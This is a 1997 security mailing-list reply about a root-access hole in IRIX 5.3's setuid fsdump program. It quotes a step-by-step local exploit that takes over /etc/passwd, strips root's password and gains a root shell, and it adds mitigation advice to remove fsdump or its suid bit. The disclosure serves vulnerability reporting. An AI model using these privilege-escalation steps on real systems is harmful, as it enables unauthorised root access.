[47] in Best-of-Security
BoS: Re: IRIX 5.3 /var/rfindd/fsdump - exploit
daemon@ATHENA.MIT.EDU (Yuri Volobuev)
Wed Feb 26 05:16:22 1997
Date: Tue, 25 Feb 1997 11:03:24 -0600
Reply-To: Yuri Volobuev <volobuev@t1.chem.umn.edu>
From: Yuri Volobuev <volobuev@t1.chem.umn.edu>
In-Reply-To: <199702251433.GAA22777@viewgraphics.com>
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net
It's been on bugtraq last Nov or Dec, I believe. fsdump is full of holes.
Exploit very similar to this one was posted, plus another less cute one
which nukes passwd using .lock file before recreating/chowning it. It's
also present on 6.2. Good solution would be to remove fsdump subsystem
entirely, it's about as useless (and unused) as any piece of software could
be. Removing suid bit works as well (it'll render fsdump useless anyway).
May be an idea of Irix security FAQ is not all that bad, after all.
Searching bugtraq archives isn't something people do routinely. I can
probably put something like this together, and I sure could use help of
contributors and beta-readers.
cheers,
yuri
On Tue, 25 Feb 1997, Chris Sheldon wrote:
> Ok. Well, yet another IRIX 5.3 root exploit.
> Of course, the major problem here is that IRIX allow users to
> give away ownership of files. Without that, this could only
> be used for changing the permissions on file so that you could read
> and modify..
>
> The system (an Indy):
> IRIX irix 5.3 11091812 IP22 mips
>
> irix% ls -la /var/rfindd/fsdump
> ---s--x--x 1 root sys 62032 Jul 25 1995 /var/rfindd/fsdump
>
> What tipped me off that it was exploitable was the fact that it
> was a protected suid binary (---s--x--x). I thought: if someone at
> SGI is being careful to not let non-root users read the binary,
> then it *must* be packed with holes... :-)
>
> So, I'm just a normal user today...
>
> irix% id
> uid=1799(csh) gid=500(users)
>
> irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
> (count to three, and hit ctrl-c)
>
> irix% ls -la /etc/passwd
> -rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
>
> And now I've got root access...
>
> irix% tail -8 /etc/passwd
> nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
> noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
> nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
>
> Tue Feb 25 06:23:48 PST 1997
> Number of inodes total 208740; allocated 31259
> Collecting garbage.
> interrupted
>
> All you have to do is edit off the garbage from the passwd file,
> delete the encrypted root password and reset the perms on the passwd file.
>
> irix% vi /etc/passwd # remove the encrypted root password
> irix% chgrp sys /etc/passwd
> irix% chown root /etc/passwd
> irix% su -
> irix#
>
>
> That's it.
> (Heck, you don't even have to remove the garbage from the passwd file.)
>
> This can be used to access pretty much any file on the system
> which is currently group owned...
>
> fun, fun, fun until SGI takes the bugs away... ;-) (right)
>
